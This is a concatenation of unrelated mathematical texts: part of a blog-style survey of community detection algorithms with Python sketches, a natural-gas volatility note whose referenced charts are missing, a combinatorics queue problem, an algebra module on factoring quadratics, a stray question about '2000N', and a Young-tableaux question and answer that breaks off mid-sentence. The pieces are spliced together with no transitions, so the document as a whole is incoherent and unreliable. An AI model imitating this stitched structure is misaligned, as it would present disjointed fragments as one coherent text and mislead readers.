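    adj = {v: set() for v in vertices}
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    S, m = set(vertices), len(edges)
    best_density, best_S = -1.0, set()
    while S:
        density = 2.0 * m / len(S)  # average degree within S
        if density > best_density:
            best_density, best_S = density, set(S)
        v = min(S, key=lambda u: len(adj[u]))  # peel a minimum-degree vertex
        for w in adj[v]:
            adj[w].discard(v)
        m -= len(adj[v])
        S.remove(v)
    return best_S, best_density

# K4 with a pendant vertex: the densest subgraph is the K4 itself.
print(greedy_densest_subgraph(range(5),
      [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4)]))
```

On this example the pendant vertex is peeled first, and the surviving $K_4$ (average degree 3) is the reported answer.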
One problem with this is that the size of the densest subgraph might be too big. Unfortunately, if you fix the size of the dense subgraph you’re looking for (say, you want to find the densest subgraph of size at most $k$ where $k$ is an input), then the problem once again becomes NP-hard and suffers from the same sort of inapproximability theorems as finding the largest clique.
A more important issue with this is that a dense subgraph isn’t necessarily a community. In particular, we want communities to be dense on the inside and sparse on the outside. The densest subgraph analysis, however, might rate the following graph as one big dense subgraph instead of two separately dense communities with some modest (but not too modest) amount of connections between them.
What are the correct communities here?
Indeed, we want a quantifiable notion of “dense on the inside and sparse on the outside.” One such formalization is called modularity. Modularity works as follows. If you give me some partition of the vertices of $G$ into two sets, modularity measures how well this partition reflects two separate communities. It’s the definition of “community” here that makes it interesting. Rather than ask about densities exactly, you compare the observed densities to the expected densities under a given random graph model.
In particular, we can use the fixed-degree distribution model from the last section. If we know the degrees of all the vertices ahead of time, we can compute the probability that we see some number of edges going between the two pieces of the partition relative to what we would see at random. If the difference is large (and largely biased toward fewer edges across the partition and more edges within the two subsets), then we say it has high modularity. This involves a lot of computations — the whole measure can be written as a quadratic form via one big matrix — but the idea is simple enough. We intend to write more about modularity and implement the algorithm on this blog, but the excited reader can see the original paper of M.E.J. Newman.
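The measure itself fits in a few lines. This sketch (mine, not from the original paper) uses the standard community-sum form of Newman's modularity, assuming an undirected simple graph: for each community, the observed fraction of within-community edges minus the fraction expected under the fixed-degree random model.

```python
from collections import Counter

def modularity(edges, community):
    """Q = sum over communities c of (e_c / m - (d_c / 2m)^2), where e_c is
    the number of edges inside c and d_c the total degree of c's vertices."""
    m = len(edges)
    deg = Counter()
    for u, v in edges:
        deg[u] += 1
        deg[v] += 1
    q = 0.0
    for c in set(community.values()):
        inside = sum(1 for u, v in edges
                     if community[u] == c and community[v] == c)
        d = sum(deg[v] for v in community if community[v] == c)
        q += inside / m - (d / (2.0 * m)) ** 2
    return q

# Two triangles joined by one edge, split into the two obvious communities:
edges = [(0, 1), (0, 2), (1, 2), (3, 4), (3, 5), (4, 5), (2, 3)]
community = {0: "a", 1: "a", 2: "a", 3: "b", 4: "b", 5: "b"}
print(modularity(edges, community))  # about 0.357
```

Note that putting everything in one community always gives $Q = 0$, which is the baseline a good partition must beat.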
Now modularity is very popular but it too has shortcomings. First, even though you can compute the modularity of a given partition, there’s still the problem of finding the partition that globally maximizes modularity. Sadly, this is known to be NP-hard. Moreover, it’s known to be NP-hard even if you’re just trying to find a partition into two pieces that maximizes modularity, and even still when the graph is regular (every vertex has the same degree).
Still worse, while there are some readily accepted heuristics that often “do well enough” in practice, we don’t even know how to approximate modularity very well. Bhaskar DasGupta has a line of work studying approximations of maximum modularity, and he has proved that for dense graphs you can’t even approximate modularity to within any constant factor. That is, the best you can do is have an approximation that gets worse as the size of the graph grows. It’s similar to the bad news we had for finding the largest clique, but not as bad. For example, when the graph is sparse it’s known that one can approximate modularity to within a $\log(n)$ factor of the optimum, where $n$ is the number of vertices of the graph (for cliques the factor was like $n^c$ for some $c$, and this is drastically worse).
Another empirical issue is that modularity seems to fail to find small communities. That is, if your graph has some large communities and some small communities, strictly maximizing the modularity is not the right thing to do. So we’ve seen that even the leading method in the field has some issues.
## Something completely different
The last method I want to sketch is in the realm of “something completely different.” The notion is that if we’re given a graph, we can run some experiment on the graph, and the results of that experiment can give us insight into where the communities are.
The experiment I’m going to talk about is the random walk. Say you have a vertex $v$ in a graph $G$ and you want to find the vertices “closest” to $v$, that is, those most likely to be in the same community as $v$. What you can do is run a random walk starting at $v$: you start at $v$, pick a neighbor at random and move to it, then repeat. You can compute statistics about the vertices visited in a sample of such walks, and the vertices that you visit most often are those you declare to be “in the same community as $v$.” One important parameter is how long the walk is, but it’s generally believed to be best to keep it between 3 and 6 steps.
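Here is a rough sampling-based sketch of that idea (mine; the actual Pons–Latapy algorithm computes the walk distribution exactly rather than by Monte Carlo):

```python
import random
from collections import Counter

def walk_visits(adj, v, walk_len=4, samples=2000, seed=0):
    """Sample short random walks from v and count how often each vertex is
    visited; the most frequently visited vertices are the candidates for
    v's community."""
    rng = random.Random(seed)
    visits = Counter()
    for _ in range(samples):
        u = v
        for _ in range(walk_len):
            u = rng.choice(adj[u])
            visits[u] += 1
    return visits

# Two triangles bridged by the edge (2, 3); walks from 0 mostly stay left.
adj = {0: [1, 2], 1: [0, 2], 2: [0, 1, 3], 3: [2, 4, 5], 4: [3, 5], 5: [3, 4]}
counts = walk_visits(adj, 0)
```

On the bridged-triangles example, vertices 0, 1, 2 collect far more visits than 3, 4, 5, which is the statistical signal the method relies on.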
Of course, this is not a partition of the vertices, so it’s not a community detection algorithm, but you can turn it into one. Run this process for each vertex, and use it to compute a “distance” between all the pairs of vertices. Then you compute a tree of partitions by lumping the closest pairs of vertices into the same community, one at a time, until you’ve got every vertex. At each step of the way, you compute the modularity of the partition, and when you’re done you choose the partition that maximizes modularity. This algorithm as a whole is called the walktrap clustering algorithm, and was introduced by Pons and Latapy in 2005.
This sounds like a really great idea, because it’s intuitive: there’s a relatively high chance that the friends of your friends are also your friends. It’s also really great because there is an easily measurable tradeoff between runtime and quality: you can tune down the length of the random walk, and the number of samples you take for each vertex, to speed up the runtime but lower the quality of your statistical estimates. So if you’re working on huge graphs, you get a lot of control and a clear idea of exactly what’s going on inside the algorithm (something which is not immediately clear in a lot of these papers).
Unfortunately, I’m not aware of any concrete theoretical guarantees for walktrap clustering. The one bit of theoretical justification I’ve read over the last year is that you can relate the expected distances you get to certain spectral properties of the graph that are known to be related to community structure, but the lower bounds on maximizing modularity already suggest (though they do not imply) that walktrap won’t do that well in the worst case.
## So many algorithms, so little time!
I have only brushed the surface of the literature on community detection, and the things I have discussed are heavily biased toward what I’ve read about and used in my own research. There are methods based on information theory, label propagation, and obscure physics processes like “spin glass” (whatever that is, it sounds frustrating).
And we have only been talking about perfect community structure. What if you want to allow people to be in multiple communities, or have communities at varying levels of granularity (e.g. a sports club within a school versus the whole student body of that school)? What if we want to allow people to be “members” of a community at varying degrees of intensity? How do we deal with noisy signals in our graphs? For example, if we get our data from observing people talk, are two people who have heated arguments considered to be in the same community? Since a lot of social network data comes from sources like Twitter and Facebook where arguments are rampant, how do we distinguish between useful and useless data? More subtly, how do we determine useful information if a group within the social network is trying to mask its discovery? That is, how do we deal with adversarial noise in a graph?
And all of this is just on static graphs! What about graphs that change over time? You can keep making the problem more and more complicated as it gets more realistic.
With the huge wealth of research that has already been done just on the simplest case, and the difficult problems and known barriers to success even for the simple problems, it seems almost intimidating to even begin to try to answer these questions. But maybe that’s what makes them fascinating, not to mention that governments and big businesses pour many millions of dollars into this kind of research.
In the future of this blog we plan to derive and implement some of the basic methods of community detection. This includes, as a first outline, the modularity measure and the walktrap clustering algorithm. Considering that I’m also going to spend a large part of the summer thinking about these problems (indeed, with some of the leading researchers and upcoming stars under the sponsorship of the American Mathematical Society), it’s unlikely to end there.
Until next time!
# More on Time-Varying Volatility in NGH4
It looks like incorporating the last 12 months of daily NGH4 prices helps bring the recent volatility into focus. Estimating the Markov regime-switching AR model over the last 12 months (on daily log returns) affords:
$r_{ng,t} = \begin{cases} 0.0006 -0.0429r_{ng,t-1}+ e_{S1,t}, \:\:\:\:\:\:\:\: e_{S1} \sim N(0,0.0122) \\ 0.0040+0.55185r_{ng,t-1}+e_{S2,t}, \:\:\:\:\:\:\: e_{S2} \sim N(0,0.0309) \end{cases}$
with the transition matrix:
$P=\begin{bmatrix} 0.92 & 0.50 \\ 0.08 & 0.50 \end{bmatrix}$
This gives annualized volatilities of 19.47% in the low vol state, and 49.08% in the high vol state. Weighting these volatilities by filtered state probability gives:
and NGH4 over the same period is:
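For reference, the per-state annualized figures follow from the daily sigmas in the regime equations above, scaled by the square root of the trading-day count. This is a sketch assuming 252 trading days; the small differences from the quoted 19.47% and 49.08% come from rounding in the reported sigmas.

```python
import math

def annualize(daily_sigma, trading_days=252):
    """Annualized volatility from a daily-return standard deviation."""
    return daily_sigma * math.sqrt(trading_days)

print(round(annualize(0.0122), 4))  # low-vol state:  ~0.19
print(round(annualize(0.0309), 4))  # high-vol state: ~0.49
```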
Question
# Let $$n$$ be the number of ways in which $$5$$ boys and $$5$$ girls can stand in a queue in such a way that all the girls stand consecutively in the queue. Let $$m$$ be the number of ways in which $$5$$ boys and $$5$$ girls can stand in a queue in such a way that exactly four girls stand consecutively in the queue. Then the value of $$\dfrac {m}{n}$$, is
Solution
Let us calculate $$n$$ first. Treat the $$5$$ girls as a single block; together with the $$5$$ boys this gives $$6$$ units, which can be arranged in $$6!$$ ways, and the girls within the block can be arranged in $$5!$$ ways. Hence $$n = 5! \times 6!$$.

Now let us calculate $$m$$, where exactly $$4$$ girls stand together.

Case 1: the block of $$4$$ girls is at an end of the queue. The $$4$$ girls can be selected and permuted in $$^5P_4 = 5!$$ ways, and the $$5$$ boys can be placed in $$5!$$ ways. The $$5^{th}$$ girl can occupy any of the remaining $$6$$ positions except the one adjacent to the block, giving $$5$$ choices. With $$2$$ possible ends, this case contributes $$2 \times 5 \times 5! \times 5!$$ arrangements.

Case 2: the block of $$4$$ girls is not at an end. Its position can be chosen in $$5$$ ways, the $$4$$ girls can be selected and permuted in $$^5P_4$$ ways, the $$5^{th}$$ girl can be placed in $$4$$ ways (not adjacent to either side of the block), and the $$5$$ boys can be placed in $$5!$$ ways, contributing $$5 \times 4 \times 5! \times 5!$$ arrangements.

Hence $$m = 30 \times 5! \times 5!$$, and therefore $$\dfrac{m}{n} = \dfrac{30 \times 5! \times 5!}{5! \times 6!} = \dfrac{30}{6} = 5$$.
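Since the factor $$5! \times 5!$$ (girls permuted, boys permuted) appears in both $$m$$ and $$n$$, the ratio depends only on which $$5$$ of the $$10$$ queue positions the girls occupy. A quick brute-force check of this, added here as an illustration and not part of the original solution:

```python
from itertools import combinations

def max_run(positions):
    """Length of the longest run of consecutive positions."""
    s = sorted(positions)
    best = length = 1
    for a, b in zip(s, s[1:]):
        length = length + 1 if b == a + 1 else 1
        best = max(best, length)
    return best

patterns = list(combinations(range(10), 5))  # girls' possible position sets
n_patterns = sum(1 for p in patterns if max_run(p) == 5)  # all 5 together
m_patterns = sum(1 for p in patterns if max_run(p) == 4)  # exactly 4 together
print(n_patterns, m_patterns, m_patterns / n_patterns)  # 6 30 5.0
```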
This module is from Elementary Algebra by Denny Burzynski and Wade Ellis, Jr. Methods of solving quadratic equations as well as the logic underlying each method are discussed. Factoring, extraction of roots, completing the square, and the quadratic formula are carefully developed. The zero-factor property of real numbers is reintroduced. The chapter also includes graphs of quadratic equations based on the standard parabola, y = x^2, and applied problems from the areas of manufacturing, population, physics, geometry, mathematics (numbers and volumes), and astronomy, which are solved using the five-step method. Objectives of this module: be able to solve quadratic equations by factoring.
Overview
• Factoring Method
• Solving Mentally After Factoring
Factoring method
To solve quadratic equations by factoring, we must make use of the zero-factor property.
1. Set the equation equal to zero, that is, get all the nonzero terms on one side of the equal sign and 0 on the other.
$a{x}^{2}+bx+c=0$
2. Factor the quadratic expression.

$\left(\right)\left(\right)=0$
3. By the zero-factor property, at least one of the factors must be zero, so, set each of the factors equal to 0 and solve for the variable.
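These steps can also be checked numerically. The short routine below is an illustration added to this module, not part of the original text; it searches integer factor pairs, using the fact that if $x^2+bx+c=(x-p)(x-q)$, then $p+q=-b$ and $pq=c$.

```python
def factor_roots(b, c):
    """Solve x^2 + b*x + c = 0 by factoring over the integers:
    look for integers p, q with p + q = -b and p * q = c."""
    for p in range(-abs(c) - 1, abs(c) + 2):
        q = -b - p
        if p * q == c:
            return sorted({p, q})
    return None  # not factorable over the integers

print(factor_roots(-7, 12))  # x^2 - 7x + 12 = (x - 3)(x - 4): [3, 4]
```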
Sample set a
Solve the following quadratic equations. (We will show the check for problem 1.)
$\begin{array}{lllllllll}{x}^{2}-7x+12\hfill & =\hfill & 0.\hfill & \hfill & \hfill & \hfill & \hfill & \hfill & \begin{array}{l}\text{The\hspace{0.17em}equation\hspace{0.17em}is\hspace{0.17em}already\hspace{0.17em}}\\ \text{set\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}0}\text{.\hspace{0.17em}Factor}\text{.}\end{array}\hfill \\ \left(x-3\right)\left(x-4\right)\hfill & =\hfill & 0\hfill & \hfill & \hfill & \hfill & \hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}0}\text{.}\hfill \\ \hfill x-3& =\hfill & 0\hfill & \hfill & \text{or}\hfill & \hfill & x-4\hfill & =\hfill & 0\hfill \\ \hfill x& =\hfill & 3\hfill & \hfill & \text{or}\hfill & \hfill & \hfill x& =\hfill & 4\hfill \end{array}$
$\begin{array}{llllll}Check:\text{\hspace{0.17em}}\text{If}\text{\hspace{0.17em}}x=3,\text{\hspace{0.17em}}{x}^{2}-7x\hfill & +\hfill & 12\hfill & =\hfill & 0\hfill & \hfill \\ \hfill {3}^{2}-7\text{\hspace{0.17em}}·\text{\hspace{0.17em}}3& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill 9-21& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill & \hfill & 0\hfill & =\hfill & 0\hfill & \text{Yes,\hspace{0.17em}this\hspace{0.17em}is\hspace{0.17em}correct}\text{.}\hfill \end{array}$
$\begin{array}{llllll}Check:\text{\hspace{0.17em}}\text{If}\text{\hspace{0.17em}}x=4,\text{\hspace{0.17em}}{x}^{2}-7x\hfill & +\hfill & 12\hfill & =\hfill & 0\hfill & \hfill \\ \hfill {4}^{2}-7\text{\hspace{0.17em}}·\text{\hspace{0.17em}}4& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill 16-28& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill & \hfill & 0\hfill & =\hfill & 0\hfill & \text{Yes,\hspace{0.17em}this\hspace{0.17em}is\hspace{0.17em}correct}\text{.}\hfill \end{array}$
Thus, the solutions to this equation are $x=3,\text{\hspace{0.17em}}4.$
$\begin{array}{lllll}\hfill {x}^{2}& =\hfill & 25.\hfill & \hfill & \text{Set\hspace{0.17em}the\hspace{0.17em}equation\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ \hfill {x}^{2}-25& =\hfill & 0\hfill & \hfill & \text{Factor}\text{.}\hfill \\ \left(x+5\right)\left(x-5\right)\hfill & =\hfill & 0\hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ x+5=0\hfill & \text{or}\hfill & \hfill & x-5=0\hfill & \hfill \\ x=-5\hfill & \text{or}\hfill & \hfill & x=5\hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=5,-5.$
$\begin{array}{lllll}\hfill {x}^{2}& =\hfill & 2x.\hfill & \hfill & \text{Set\hspace{0.17em}the\hspace{0.17em}equation\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ {x}^{2}-2x\hfill & =\hfill & 0\hfill & \hfill & \text{Factor}\text{.}\hfill \\ x\left(x-2\right)\hfill & =\hfill & 0\hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ x=0\hfill & \text{or}\hfill & \hfill & x-2=0\hfill & \hfill \\ \hfill & \hfill & \hfill & x=2\hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=0,\text{\hspace{0.17em}}2.$
$\begin{array}{lllll}2{x}^{2}+7x-15\hfill & =\hfill & 0.\hfill & \hfill & \text{Factor}\text{.}\hfill \\ \left(2x-3\right)\left(x+5\right)\hfill & =\hfill & 0\hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ 2x-3=0\hfill & \text{or}\hfill & \hfill & x+5=0\hfill & \hfill \\ 2x=3\hfill & \text{or}\hfill & \hfill & x=-5\hfill & \hfill \\ x=\frac{3}{2}\hfill & \hfill & \hfill & \hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=\frac{3}{2},-5.$
$63{x}^{2}=13x+6$
$\begin{array}{lllll}63{x}^{2}-13x-6\hfill & =\hfill & 0\hfill & \hfill & \hfill \\ \left(9x+2\right)\left(7x-3\right)\hfill & =\hfill & 0\hfill & \hfill & \hfill \\ 9x+2=0\hfill & \hfill & \text{or}\hfill & \hfill & 7x-3=0\hfill \\ 9x=-2\hfill & \hfill & \text{or}\hfill & \hfill & 7x=3\hfill \\ x=\frac{-2}{9}\hfill & \hfill & \text{or}\hfill & \hfill & x=\frac{3}{7}\hfill \end{array}$
Thus, the solutions to this equation are $x=\frac{-2}{9},\frac{3}{7}.$
Practice set a
Solve the following equations, if possible.
$\left(x-7\right)\left(x+4\right)=0$
$x=7,\text{\hspace{0.17em}}-4$
$\left(2x+5\right)\left(5x-7\right)=0$
$x=\frac{-5}{2},\frac{7}{5}$
${x}^{2}+2x-24=0$
$x=4,\text{\hspace{0.17em}}-6$
$6{x}^{2}+13x-5=0$
$x=\frac{1}{3},\frac{-5}{2}$
$5{y}^{2}+2y=3$
$y=\frac{3}{5},-1$
$m\left(2m-11\right)=0$
$m=0,\frac{11}{2}$
$6{p}^{2}=-\left(5p+1\right)$
$p=\frac{-1}{3},\frac{-1}{2}$
${r}^{2}-49=0$
$r=7,-7$
Solving mentally after factoring
Let’s consider problems 4 and 5 of Sample Set A in more detail. Let’s look particularly at the factorizations $\left(2x-3\right)\left(x+5\right)=0$ and $\left(9x+2\right)\left(7x-3\right)=0.$ The next step is to set each factor equal to zero and solve. We can solve mentally if we understand how to solve linear equations: we transpose the constant from the variable term and then divide by the coefficient of the variable.
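In symbols: the root of the linear factor $ax+b$ is $x=\frac{-b}{a}$ (change the sign of the constant, divide by the coefficient). As a small illustration added to this module:

```python
from fractions import Fraction

def root_of_factor(a, b):
    """Root of the factor a*x + b: flip the sign of the constant term
    and divide by the coefficient of x."""
    return Fraction(-b, a)

print(root_of_factor(2, -3))  # (2x - 3): 3/2
print(root_of_factor(9, 2))   # (9x + 2): -2/9
```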
Sample set b
Solve the following equation mentally.
$\left(2x-3\right)\left(x+5\right)=0$
$\begin{array}{lllll}2x-3\hfill & =\hfill & 0\hfill & \hfill & \text{Mentally\hspace{0.17em}add\hspace{0.17em}3\hspace{0.17em}to\hspace{0.17em}both\hspace{0.17em}sides}\text{.\hspace{0.17em}The\hspace{0.17em}constant\hspace{0.17em}changes\hspace{0.17em}sign}\text{.}\hfill \\ \hfill 2x& =\hfill & 3\hfill & \hfill & \begin{array}{l}\text{Divide\hspace{0.17em}by\hspace{0.17em}2,\hspace{0.17em}the\hspace{0.17em}coefficient\hspace{0.17em}of\hspace{0.17em}}x\text{.\hspace{0.17em}The\hspace{0.17em}2\hspace{0.17em}divides\hspace{0.17em}the\hspace{0.17em}constant\hspace{0.17em}3\hspace{0.17em}into\hspace{0.17em}}\frac{3}{2}\text{.\hspace{0.17em}}\\ \text{The\hspace{0.17em}coefficient\hspace{0.17em}becomes\hspace{0.17em}the\hspace{0.17em}denominator}\text{.}\end{array}\hfill \\ \hfill x& =\hfill & \frac{3}{2}\hfill & \hfill & \hfill \\ \hfill x+5& =\hfill & 0\hfill & \hfill & \text{Mentally\hspace{0.17em}subtract\hspace{0.17em}5\hspace{0.17em}from\hspace{0.17em}both\hspace{0.17em}sides}\text{.\hspace{0.17em}The\hspace{0.17em}constant\hspace{0.17em}changes\hspace{0.17em}sign}\text{.}\hfill \\ \hfill x& =\hfill & -5\hfill & \hfill & \text{Divide\hspace{0.17em}by\hspace{0.17em}the\hspace{0.17em}coefficient\hspace{0.17em}of\hspace{0.17em}\hspace{0.17em}}x\text{,\hspace{0.17em}1}\text{.The\hspace{0.17em}coefficient\hspace{0.17em}becomes\hspace{0.17em}the\hspace{0.17em}denominator}\text{.}\hfill \\ \hfill x=\frac{-5}{1}& =\hfill & -5\hfill & \hfill & \hfill \\ \hfill x& =\hfill & -5\hfill & \hfill & \hfill \end{array}$
Now, we can immediately write the solution to the equation after factoring by looking at each factor, changing the sign of the constant, then dividing by the coefficient.
Practice set b
Solve $\left(9x+2\right)\left(7x-3\right)=0$ using this mental method.
$x=-\frac{2}{9},\frac{3}{7}$
Exercises
For the following problems, solve the equations, if possible.
$\left(x+1\right)\left(x+3\right)=0$
$x=-1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
$\left(x+4\right)\left(x+9\right)=0$
$\left(x-5\right)\left(x-1\right)=0$
$x=1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}5$
$\left(x-6\right)\left(x-3\right)=0$
$\left(x-4\right)\left(x+2\right)=0$
$x=-2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}4$
$\left(x+6\right)\left(x-1\right)=0$
$\left(2x+1\right)\left(x-7\right)=0$
$x=-\frac{1}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
$\left(3x+2\right)\left(x-1\right)=0$
$\left(4x+3\right)\left(3x-2\right)=0$
$x=-\frac{3}{4},\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{2}{3}$
$\left(5x-1\right)\left(4x+7\right)=0$
$\left(6x+5\right)\left(9x-4\right)=0$
$x=-\frac{5}{6},\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{4}{9}$
$\left(3a+1\right)\left(3a-1\right)=0$
$x\left(x+4\right)=0$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}0$
$y\left(y-5\right)=0$
$y\left(3y-4\right)=0$
$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{4}{3}$
$b\left(4b+5\right)=0$
$x\left(2x+1\right)\left(2x+8\right)=0$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\text{\hspace{0.17em}}\frac{1}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}0$
$y\left(5y+2\right)\left(2y-1\right)=0$
${\left(x-8\right)}^{2}=0$
$x=8$
${\left(x-2\right)}^{2}=0$
${\left(b+7\right)}^{2}=0$
$b=-7$
${\left(a+1\right)}^{2}=0$
$x{\left(x-4\right)}^{2}=0$
$x=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}4$
$y{\left(y+9\right)}^{2}=0$
$y{\left(y-7\right)}^{2}=0$
$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
$y{\left(y+5\right)}^{2}=0$
${x}^{2}-4=0$
$x=-2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}2$
${x}^{2}+9=0$
${x}^{2}+36=0$
no solution
${x}^{2}-25=0$
${a}^{2}-100=0$
$a=-10,\text{\hspace{0.17em}}\text{\hspace{0.17em}}10$
${a}^{2}-81=0$
${b}^{2}-49=0$
$b=7,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-7$
${y}^{2}-1=0$
$3{a}^{2}-75=0$
$a=5,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-5$
$5{b}^{2}-20=0$
${y}^{3}-y=0$
$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
${a}^{2}=9$
${b}^{2}=4$
$b=2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-2$
${b}^{2}=1$
${a}^{2}=36$
$a=6,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-6$
$3{a}^{2}=12$
$-2{x}^{2}=-4$
$x=\sqrt{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\sqrt{2}$
$-2{a}^{2}=-50$
$-7{b}^{2}=-63$
$b=3,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
$-2{x}^{2}=-32$
$3{b}^{2}=48$
$b=4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-4$
${a}^{2}-8a+16=0$
${y}^{2}+10y+25=0$
$y=-5$
${y}^{2}+9y+16=0$
${x}^{2}-2x-1=0$
not factorable over the integers; no rational solutions
${a}^{2}+6a+9=0$
${a}^{2}+4a+4=0$
$a=-2$
${x}^{2}+12x=-36$
${b}^{2}-14b=-49$
$b=7$
$3{a}^{2}+18a+27=0$
$2{m}^{3}+4{m}^{2}+2m=0$
$m=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
$3m{n}^{2}-36mn+36m=0$
${a}^{2}+2a-3=0$
$a=-3,\text{\hspace{0.17em}}\text{\hspace{0.17em}}1$
${a}^{2}+3a-10=0$
${x}^{2}+9x+14=0$
$x=-7,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-2$
${x}^{2}-7x+12=3$
${b}^{2}+12b+27=0$
$b=-9,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
${b}^{2}-3b+2=0$
${x}^{2}-13x=-42$
$x=6,\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
${a}^{3}=-8{a}^{2}-15a$
$6{a}^{2}+13a+5=0$
$a=-\frac{5}{3},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\frac{1}{2}$
$6{x}^{2}-4x-2=0$
$12{a}^{2}+15a+3=0$
$a=-\frac{1}{4},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
$18{b}^{2}+24b+6=0$
$12{a}^{2}+24a+12=0$
$a=-1$
$4{x}^{2}-4x=-1$
$2{x}^{2}=x+15$
$x=-\frac{5}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}3$
$4{a}^{2}=4a+3$
$4{y}^{2}=-4y-2$
no solution
$9{y}^{2}=9y+18$
Exercises for review
( [link] ) Simplify ${\left({x}^{4}{y}^{3}\right)}^{2}{\left(x{y}^{2}\right)}^{4}.$
${x}^{12}{y}^{14}$
( [link] ) Write ${\left({x}^{-2}{y}^{3}{w}^{4}\right)}^{-2}$ so that only positive exponents appear.
( [link] ) Find the sum: $\frac{x}{{x}^{2}-x-2}+\frac{1}{{x}^{2}-3x+2}.$
$\frac{{x}^{2}+1}{\left(x+1\right)\left(x-1\right)\left(x-2\right)}$
( [link] ) Simplify $\frac{\frac{1}{a}+\frac{1}{b}}{\frac{1}{a}-\frac{1}{b}}.$
( [link] ) Solve $\left(x+4\right)\left(3x+1\right)=0.$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{-1}{3}$
Damian
how did you get the value of 2000N.What calculations are needed to arrive at it
|
|
# Semi-Standard Young Diagrams and Families
In connection with string theory I encountered the following problem:
Given the set M_N of all semi-standard Young tableaux of size N (i.e., all fillings of Ferrers diagrams with natural numbers, with weakly increasing rows and strictly increasing columns, whose entries sum to N).
The conjecture, which I cannot prove and for which I know no counterexample states:
M_N is the union of disjoint families, where each family consists of a father diagram and all his daughters, which are obtained from the father diagram by deletion of one box.
The conjecture holds for N<=8
http://www.itp.uni-hannover.de/~dragon/young.pdf
There, numbers a and b are attached to the Ferrers diagrams, where a is the number of semi-standard Young tableaux of that shape and size N, and b is the number of fathers who remain after the daughters have filled up their families.
Light cone string theory proves that the conjecture holds for all M_N with less than 25 rows, i.e. for N < 325. But string theory provides no counterexample for N >= 325.
Any suggestions, e.g. how to compute the number a(N,lambda) of Young diagrams with size N and shape lambda, would be helpful.
Norbert Dragon
I use standard facts about symmetric functions that can be found, e.g., in Chapter 7 of Enumerative Combinatorics, vol. 2. Let $s_\lambda$ denote a Schur function and $p_1=s_1=x_1+x_2+\cdots$. Then $\frac{\partial s_\lambda}{\partial p_1}=\sum_\mu s_\mu$, where the $\mu$'s are obtained by removing a single box from $\lambda$. Moreover, the coefficient of $q^n$ in $s_\lambda(q,q^2,q^3,\dots)$ is equal to the number of SSYT of shape $\lambda$ with entries summing to $n$. Thus if we let $c_n$ be the coefficient of $q^n$ in the symmetric function $f$ defined by $$f+\frac{\partial}{\partial p_1}f = \sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots),$$ and if $c_n=\sum a_{\mu,n}s_\mu$, then we need $a_{\mu,n}$ copies of the shape $\mu$ in a set of fathers generating all SSYT with entries summing to $n$. Hence we need to show that $a_{\mu,n}\geq 0$. Now $$\sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots) = \exp \sum_{n\geq 1} \frac{q^n}{1-q^n}p_n.$$ This leads to a simple linear first-order differential equation with solution $$f = (1-q) \sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots).$$ If $h_u$ denotes the hook length of the square $u$ of $\lambda$, then $$s_\lambda(q,q^2,q^3,\dots) = \frac{q^{b(\lambda)}}{\prod_{u\in \lambda} (1-q^{h_u})},$$ where $b(\lambda)=\sum i\lambda_i$. Since there is always a hook length equal to one, the power series $(1-q)s_\lambda(q,q^2,q^3,\dots)$ will be a product of factors of the form 